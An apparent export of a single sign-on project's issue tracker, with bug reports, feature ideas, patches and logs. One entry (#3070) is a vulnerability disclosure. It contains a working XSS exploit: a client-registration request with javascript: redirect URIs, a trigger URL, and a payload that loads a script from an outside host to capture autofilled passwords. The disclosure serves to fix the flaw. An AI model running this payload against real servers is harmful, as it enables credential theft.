lemonldap-ng issueshttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues2024-02-01T17:14:32Zhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3096No more logs Session granted for *2024-02-01T17:14:32Zdcoutadeur dcoutadeurNo more logs Session granted for *As stated by the documentation:
https://lemonldap-ng.org/documentation/2.0/logs.html#user-log-samples
we should have a log displaying the user logged and his IP address:
```
[notice] Session granted for dwho by LDAP (81.20.13.21)
```
...As stated by the documentation:
https://lemonldap-ng.org/documentation/2.0/logs.html#user-log-samples
we should have a log displaying the user logged and his IP address:
```
[notice] Session granted for dwho by LDAP (81.20.13.21)
```
However, now, the log is managed by the GrantSession plugin, which is not enabled by default, as in configuration we have:
```
'grantSessionRules' => {}
```
and empty hash is considered as disabled.
This issue is just to discuss the desired behaviour:
- set a default value:
```
'grantSessionRules' => {
'always allowed##default_rule' => 1
}
```
- fix the documentation to indicate that there is no log by default, except if the admin set a grantSessionRule2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3095Add llngUserAttributes tools2024-03-27T09:16:32ZYaddAdd llngUserAttributes toolsThe idea is to have a sort of `ldapsearch` but based on portal "getUser+macros+groups". Maybe something like:
```perl
#!/usr/bin/perl
use strict;
use JSON;
use Lemonldap::NG::Portal;
my $p = Lemonldap::NG::Portal->new;
$p->init({logLev...The idea is to have a sort of `ldapsearch` but based on portal "getUser+macros+groups". Maybe something like:
```perl
#!/usr/bin/perl
use strict;
use JSON;
use Lemonldap::NG::Portal;
my $p = Lemonldap::NG::Portal->new;
$p->init({logLevel => 'warn'});
my $uid = $ARGV[0] or die 'Missing uid';
my $req = Lemonldap::NG::Portal::Main::Request->new( {
REQUEST_URI => '/',
REMOTE_ADDR => '127.0.0.1',
PATH_INFO => '/',
}
);
$req->user($uid);
$req->steps( [
'getUser', @{ $p->betweenAuthAndData },
'setSessionInfo', $p->groupsAndMacros,
'setLocalGroups',
]
);
$p->process($req);
print JSON->new->canonical->pretty->encode($req->sessionInfo);
```
What do you think ?2.19.0YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3094add a portalCustomJs option2024-01-26T13:56:53ZMaxime Bessonadd a portalCustomJs optionWe already have a very simple way to add css code to the portal without creating a new theme: portalCustomCss
It can be useful to add some JS too, if you need to hook to some jquery events or just simple JS customizationWe already have a very simple way to add css code to the portal without creating a new theme: portalCustomCss
It can be useful to add some JS too, if you need to hook to some jquery events or just simple JS customization2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3093mails not delivered since 2.18 due to invalid "to:" format2024-02-06T09:16:32Zdcoutadeur dcoutadeurmails not delivered since 2.18 due to invalid "to:" format### Affected version
Version: %2.18.1
Platform: Nginx
### Summary
When llng sends a password reset mail, the mail is not reveived due to an invalid "to:" field.
For example:
```
To: david.coutadeur@worteks.com <david.coutadeur@wort...### Affected version
Version: %2.18.1
Platform: Nginx
### Summary
When llng sends a password reset mail, the mail is not reveived due to an invalid "to:" field.
For example:
```
To: david.coutadeur@worteks.com <david.coutadeur@worteks.com>
```
When received by smtp.office365.com, this mail is displayed as:
```
To: david.coutadeur@
BCC: <david.coutadeur@worteks.com>
```
Consequence: the mail *is* received by the user, because of the BCC field (I don't know how this field is added though), but the admin also receives a "non-delivery" mail.
### Logs
```
Content-Type: text/plain; charset="utf-8"
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.509 (Entity 5.509)
From: admin@customer.org
To: david.coutadeur@worteks.com <david.coutadeur@worteks.com>
Subject: =?utf-8?B?W0N1c3RvbWVyXSBSw6lpbml0aWFsaXNhdGlvbiBkZSBtb3QgZGUgcGFzc2U=?=
Date: Thu, 25 Jan 2024 14:45:22 +0000
Bonjour David Coutadeur,
Cliquez ici pour réinitialiser votre mot de passe :
https://auth.demo.fusioniam.org/resetpwd?mail_token=9683247caf1aaaf29051a7ff0d8157b3559d60743f8e83429c3496b60c8daa64&skin=bootstrap
Pour tout problème d’authentification merci d’écrire à admin@customer.org';
```
### Possible fixes
The problem seems to be linked to: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2990 and especially https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/commit/962effa8bfbe200c7b1555f60af9cbc1ad4f4be2
According to the this RFC: https://datatracker.ietf.org/doc/html/rfc822#section-3.1.1 the following syntax should be used:
```
To: "david.coutadeur@worteks.com" <david.coutadeur@worteks.com>
```
If you are ok @guimard, I propose to patch this into:
```perl
if ($mail =~ /^\S+\@\S+$/) {
$mail = "\"$mail\" <$mail>";
}
```2.18.2dcoutadeur dcoutadeurdcoutadeur dcoutadeurhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3092Display an error message when issuer context is not restored2024-01-25T15:49:33ZMaxime BessonDisplay an error message when issuer context is not restored### Affected version
Version: 2.18.1
### Summary
* Configure LLNG as an SAML/OIDC or CAS issuer
* Initialize login from a SP
* Log in using 2FA, SAML or something else that longer than issuersTimeout to perform
* Login works, but yo...### Affected version
Version: 2.18.1
### Summary
* Configure LLNG as an SAML/OIDC or CAS issuer
* Initialize login from a SP
* Log in using 2FA, SAML or something else that longer than issuersTimeout to perform
* Login works, but you are redirected either to the portal (SAML/CAS) or an error message (OIDC)
### Logs
```
[INFO] Bad (or expired) token 1706124567_32351
[ERROR] Unknown response type:
```
### Possible fixes
The user often gets confused about ending up on the portal, we should at least give them an error message that says they took too long so that they can understand why the application isn't displayed2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3091Send mail on password change doesn't work corretcly2024-03-27T10:46:54ZGabriele LicariSend mail on password change doesn't work corretcly### Affected version
Version: 2.18.1
Good Morning,
The option "Send a mail when password is changed" is activated, but users receive confirmation of the password change only when they force the reset (forgotten password) but not when ...### Affected version
Version: 2.18.1
Good Morning,
The option "Send a mail when password is changed" is activated, but users receive confirmation of the password change only when they force the reset (forgotten password) but not when they change it independently once logged in. What can I check to fix
this?
This seems to be a bug.2.19.0Clément OUDOTClément OUDOThttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3088Extend session lifetime when refreshing session/access token2024-01-27T19:11:12ZMaxime BessonExtend session lifetime when refreshing session/access tokenRelated to #2700
Currently, when the user obtains a new access token for a RP using a refresh token, the session is not extended (timeoutActivity/_lastSeen)
This action should be considered as session activity and thus extend the sess...Related to #2700
Currently, when the user obtains a new access token for a RP using a refresh token, the session is not extended (timeoutActivity/_lastSeen)
This action should be considered as session activity and thus extend the session duration
Maybe this should also be the case when sessions are refreshed by the Refresh session API plugin ?
OK for you @guimard / @clement_oudot ?2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3087RefreshSession plugin creates group duplicates when multiple sessions are used2024-03-26T12:28:10ZMaxime BessonRefreshSession plugin creates group duplicates when multiple sessions are used### Affected version
Version: 2.18.1
### Summary
* Enable refresh session plugin
* Login as dwho twice
* Refresh sessions for dwho with the plugin
* Groups are duplicated in $groups
### Logs
```
Store users; timelords; users; timelo...### Affected version
Version: 2.18.1
### Summary
* Enable refresh session plugin
* Login as dwho twice
* Refresh sessions for dwho with the plugin
* Groups are duplicated in $groups
### Logs
```
Store users; timelords; users; timelords in session key groups
```2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3084JWT shouldn't have a "kid" when using symetric sign algorithm2024-01-17T09:54:11ZJérémie PiersonJWT shouldn't have a "kid" when using symetric sign algorithm### Affected version
Version: 2.18.1
Platform: Nginx
### Summary
When using HS256 (or 384 | 512) as ID Token signature algorithm in an OpenIDConnect Relying Party, a "kid" property is added even though no asymetric key will be used. ...### Affected version
Version: 2.18.1
Platform: Nginx
### Summary
When using HS256 (or 384 | 512) as ID Token signature algorithm in an OpenIDConnect Relying Party, a "kid" property is added even though no asymetric key will be used. This confuses Apache mod-auth-openidc (latest version in Debian), who fails to verify signature and rejects the token.
Note : this manifests only because we do have RSA signing keys with a "kid" configured in OpenID Connect Service.
### Possible fixes
I tried to remove the following three lines in Portal/Lib/OpenIDConnect.pm :
```
--- Portal/Lib/OpenIDConnect.pm.ori 2024-01-15 14:56:20.675925536 +0100
+++ Portal/Lib/OpenIDConnect.pm 2024-01-15 14:52:27.247075049 +0100
@@ -2267,9 +2267,6 @@
encode_jwt(
payload => to_json($payload),
alg => $alg,
- extra_headers => {
- kid => $self->conf->{oidcServiceKeyIdSig},
- },
@keyArg,
);
};
```
and it does seem to fix this problem (tested only with HS256 and RS256).
May be related to commit 7a407da7d8cb642fd5b5ec24fa35d5c38aab5e24 ; seems like a previous issue #3066 was fixed two times in parallel :-)2.18.2Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3083OIDC Special-scope hook system2024-01-17T03:58:50ZYaddOIDC Special-scope hook system### Summary
The idea is to provide a plugin system to be able to add special scopes in OIDC flow (scopes not related to user's attributes
### Design proposition
Special plugin keyword### Summary
The idea is to provide a plugin system to be able to add special scopes in OIDC flow (scopes not related to user's attributes
### Design proposition
Special plugin keywordIn discussionYaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3081oidcDropCspHeaders shouldn't drop CORS headers2024-01-17T09:51:29ZYaddoidcDropCspHeaders shouldn't drop CORS headersWhen using this option, if relying party is inside web app, Chromium refuse to download OIDC metadata because of lack of CORS headers
Fixed by !432When using this option, if relying party is inside web app, Chromium refuse to download OIDC metadata because of lack of CORS headers
Fixed by !4322.18.2YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3080Allow users to retry 2FA2024-03-07T09:45:45ZMaxime BessonAllow users to retry 2FA### Summary
Currently, users get only one try to enter their 2FA, if they fail, they need to retry the entire login flow
### Design proposition
We should implement a count-limited (maybe 3 by default?) retry in 2F::Engine### Summary
Currently, users get only one try to enter their 2FA, if they fail, they need to retry the entire login flow
### Design proposition
We should implement a count-limited (maybe 3 by default?) retry in 2F::Engine2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3079UserDB::OpenIDConnect doesn't handle arrays of values2024-01-17T08:26:28ZMaxime BessonUserDB::OpenIDConnect doesn't handle arrays of values### Affected version
Version: 2.18.1
### Summary
* Configure an OIDC OP to send multi valued claims
* Configure that claim as an exported attribute in LLNG
* Exported attribute is stored as an arrayref
### Logs
```
[debug] Store ARR...### Affected version
Version: 2.18.1
### Summary
* Configure an OIDC OP to send multi valued claims
* Configure that claim as an exported attribute in LLNG
* Exported attribute is stored as an arrayref
### Logs
```
[debug] Store ARRAY(0x6390dd0) in session key groups
```2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3078Allow transmission of extra attributes in Auth/UserDB/Password::REST2024-03-27T10:26:26ZMaxime BessonAllow transmission of extra attributes in Auth/UserDB/Password::RESTCurrently, it's possible to transmit extra attributes in 2F::REST but not in Auth::REST etc.Currently, it's possible to transmit extra attributes in 2F::REST but not in Auth::REST etc.BacklogMaxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3077Handling of groups from an OIDC provider2024-03-27T09:14:16ZDaniel BerteaudHandling of groups from an OIDC provider### Affected version
Version: 2.18.1
Platform: nginx+uwsgi
### Summary
When using an OIDC provider as Auth + UserDB, I couldn't get groups to work. In my case, the OIDC provider is also a Lemonldap::NG instance. I've configured a "gr...### Affected version
Version: 2.18.1
Platform: nginx+uwsgi
### Summary
When using an OIDC provider as Auth + UserDB, I couldn't get groups to work. In my case, the OIDC provider is also a Lemonldap::NG instance. I've configured a "groups" claim containing a list of groups on the provider. This claim is correctly sent in the UserInfo endpoint. The "salve" Lemonldap::NG instance sees it, but just set the groups session keys as a stringified version of the array of groups. $hGroups remains empty, and groups are not usable.
### Logs
```
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Request User Info on https://primary.local/oauth2/userinfo with access token XXXXXXX
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] UserInfo received: {"mail":"dani@local","cn":"Daniel Berteaud","groups":["Role_Unix","Role_Dev","Role_DB_Viewer","Administrators","Role_DB_Admin","Role_GED","Role_Mail","Role_Support_Admin","Role_PKI_User","Role_Infra_Admin","Denied RODC Password Replication Group","Domain Admins","Role_Vault","Role_Visio","Role_VPN","Role_FW_Admin","Role_Audit","Equipe","Role_Seafile","Role_PKI_Admin","Role_Monitoring","IT","Role_Support_User","Role_Virt","Role_CT_Admin","Role_Matrix"],"principal":"dani@local","uid":"dani","sub":"dani"}
[...]
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store 1704448287 in session key _lastAuthnUTime
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store HASH(0x65f8a60) in session key _loginHistory
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Dump: $VAR1 = {'successLogin' => [{'ipAddr' => '10.99.20.2','_utime' => '1704448211'},{'ipAddr' => '10.99.20.2','_utime' => '1704448149'},{'ipAddr' => '10.99.20.2','error' => -4,'_utime' => '1704443859'},{'ipAddr' => '10.99.20.2','_utime' => '1704443859'},{'_utime' => '1704443073','error' => -4,'ipAddr' => '10.99.20.2'},{'ipAddr' => '10.99.20.2','_utime' => '1704443073'},{'_utime' => '1704442587','ipAddr' => '10.99.20.2','error' => -4},{'ipAddr' => '10.99.20.2','_utime' => '1704442587'},{'ipAddr' => '10.99.20.2','_utime' => '1704378084'},{'ipAddr' => '10.99.20.2','_utime' => '1704377346'}],'failedLogin' => []};
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store ARRAY(0x6390dd0) in session key groups
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Dump: $VAR1 = ['Role_Unix','Role_Dev','Role_DB_Viewer','Administrators','Role_DB_Admin','Role_GED','Role_Mail','Role_Support_Admin','Role_PKI_User','Role_Infra_Admin','Denied RODC Password Replication Group','Domain Admins','Role_Vault','Role_Visio','Role_VPN','Role_FW_Admin','Role_Audit','Equipe','Role_Seafile','Role_PKI_Admin','Role_Monitoring','IT','Role_Support_User','Role_Virt','Role_CT_Admin','Role_Matrix'];
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store 20240105105011 in session key _updateTime
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store dani in session key _user
```
Screenshot of the resulting session on the slave Lemonldap::NG
![image](/uploads/fc6bddce1c364b8c0ab943920f603df4/image.png)
### Backends used
Primary (OIDC RP) Lemonldap::NG is running
- On almalinux 8
- With nginx (OpenResty) + llng-fastcgi-server
- Using AD (samba4) as AuthDB and UserDB
- Using MariaDB as configuration and session store
Slave Lemonldap::NG is running
- On almalinux 9 (Docker based on almalinux9)
- With nginx + uwsgi
- Using OIDC as AuthDB and Same as UserDB
- An OIDC provider has been configured pointing at the primary LL::NG portal2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3076RefreshSession plugin doesn't work with choice2024-03-26T12:29:14ZMaxime BessonRefreshSession plugin doesn't work with choice### Affected version
Version: 2.18.1
### Summary
* Configure Auth::Choice
* Enable RefreshSession plugin
* Login
* refresh using the /refreshsession API
* it fails because _choice isn't set
### Logs
```
[debug] Start routing refres...### Affected version
Version: 2.18.1
### Summary
* Configure Auth::Choice
* Enable RefreshSession plugin
* Login
* refresh using the /refreshsession API
* it fails because _choice isn't set
### Logs
```
[debug] Start routing refreshsessions
[notice] Refresh request for abarnes
[debug] [notice] Refresh request for abarnes
[debug] Processing getUser
[debug] Returned error: 9 (PE_FIRSTACCESS)
[warn] Refresh failed for session 1b4228c3aea6021e271c7ce7c8acccec663ac91f5c00dd02f9379e3b53495e5d
```
### Possible fixes
populate userData in $req with all sessions attribute (including _choice) before calling the portal refresh function:
```
diff --git a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
index 6334b4508..8fd6935f4 100644
--- a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
+++ b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
@@ -36,6 +36,7 @@ sub run {
);
$req->id($id);
$req->user( $info->{uid} );
+ $req->userData( $sessions->{$id} );
my $res;
eval { $res = $self->p->refresh($req); };
if ($@) {
```
does it look ok for you @guimard ?2.19.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3073[OIDC] Implement optional "Passing Request Parameters as JWTs"2024-01-03T03:56:43ZYadd[OIDC] Implement optional "Passing Request Parameters as JWTs"See [OIDC Core - JWTRequests](https://openid.net/specs/openid-connect-core-1_0.html#JWTRequests)
Already implemented on OP side, missing in RP.
Needed by #3030See [OIDC Core - JWTRequests](https://openid.net/specs/openid-connect-core-1_0.html#JWTRequests)
Already implemented on OP side, missing in RP.
Needed by #30302.19.0YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3070[Security:low] XSS via JavaScript-URI as Redirect URI and form_post Response ...2024-02-12T02:44:25ZLauritz Holtmann[Security:low] XSS via JavaScript-URI as Redirect URI and form_post Response Mode*LEMONLDAP::NG* is vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`.
## Steps to Reproduce
Preparation:
1. Enable Public Registration via http://mana...*LEMONLDAP::NG* is vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`.
## Steps to Reproduce
Preparation:
1. Enable Public Registration via http://manager.example.com/ -> OpenID Connect Service -> Dynamic Registration (alternatively register a client via UI in the following).
2. Enable to drop CSP on Auth. Responses via http://manager.example.com/ -> OpenID Connect Service -> Security -> Drop CSP headers from OIDC responses (otherwise XSS would be blocked by browsers that support CSP directives).
Then perform the actual attack:
1. Register new Client using OIDC Dynamic Client registration:
```http
POST /oauth2/register HTTP/1.1
Host: auth.example.com
Content-Type: application/json
Content-Length: 140
{
"redirect_uris":["javascript:confirm(document.domain)","javascript:import('https://xss.lhq.at/password-disclosure.js')"]
}
```
2. Trigger XSS via `http://auth.example.com/oauth2/authorize?client_id=yCbq4Y6VZONzcrGdwVLaNgnG0Am81Q&response_type=code&response_mode=form_post&scope=openid&redirect_uri=javascript:confirm(document.domain)` (Adjust client_id)
## Impact
As shown above, JavaScript is evaluated in the conext of `http://auth.example.com/`, allowing to perform arbitrary actions on behalf of an end-user and in their session.
Further, end-user credentials can be obtained in case a victim uses a password manager that auto-fills login forms. In the following, we assume the victim uses a current Firefox.
JS-Exploit-Payload: https://xss.lhq.at/password-disclosure.js
```JavaScript
window.attackUsernameField = document.createElement("input");
window.attackPasswordField = document.createElement("input");
attackUsernameField.type = 'text';
attackUsernameField.name = 'username';
attackPasswordField.type = 'password';
attackPasswordField.autocomplete = 'current-password';
attackPasswordField.addEventListener("change",()=>{alert(`Username: ${attackUsernameField.value}\nPassword: ${attackPasswordField.value}`)});
document.body.appendChild(attackUsernameField);
document.body.appendChild(attackPasswordField);
```
Note that FF only auto-fills credentials in secure contexts (HTTPS), so that testing this may require additional configuration.
To test password disclosure, use current Firefox and:
1. Browse `https://auth.example.com/` and enter exemplary invalid credentials. Opt-in to store credentials in your browser!
2. Browse `https://auth.example.com/oauth2/authorize?client_id=lhibBNkkd4w8hPLPxjehY8fAT2MD/L&response_type=code&response_mode=form_post&scope=openid&redirect_uri=javascript:import(%27https://xss.lhq.at/password-disclosure.js%27)` and observe `alert()` with clear text credentials.
The impact is limited by a Content-Security-Policy directive which was enabled by default in my test setup. There is a specific option to disable this setting and there are still browsers out-there and in use that do not support CSP directives.
## Recommendation
It is recommended to do not allow dangerous schemes such as `javascript`, `data` or `vbscript` as allowed Redirect URIs.2.18.2YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3068Regression in configuration reload2023-12-22T22:56:15ZMaxime BessonRegression in configuration reloadI am able to reproduce a rather strange regression cause by ec8b3e30e9f38900addf96c7033d4c7d99f0d9f7
* Only when one of my vhosts uses logout_app_sso
* A config change in the manager is not immediately applied on the portal (checkConf=1 ...I am able to reproduce a rather strange regression cause by ec8b3e30e9f38900addf96c7033d4c7d99f0d9f7
* Only when one of my vhosts uses logout_app_sso
* A config change in the manager is not immediately applied on the portal (checkConf=1 in llng.ini)
* Config changes in the CLI are immediately applied
low priority but annoying2.18.1Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3067Error when verifying signature when OP uses more than one key and kid missing...2023-12-21T17:42:23ZMaxime BessonError when verifying signature when OP uses more than one key and kid missing in ID Tokencf #3065
This is not permitted in OIDC but we might want to support it for some applications / older LLNG releases
MR !423cf #3065
This is not permitted in OIDC but we might want to support it for some applications / older LLNG releases
MR !4232.18.1YaddYadd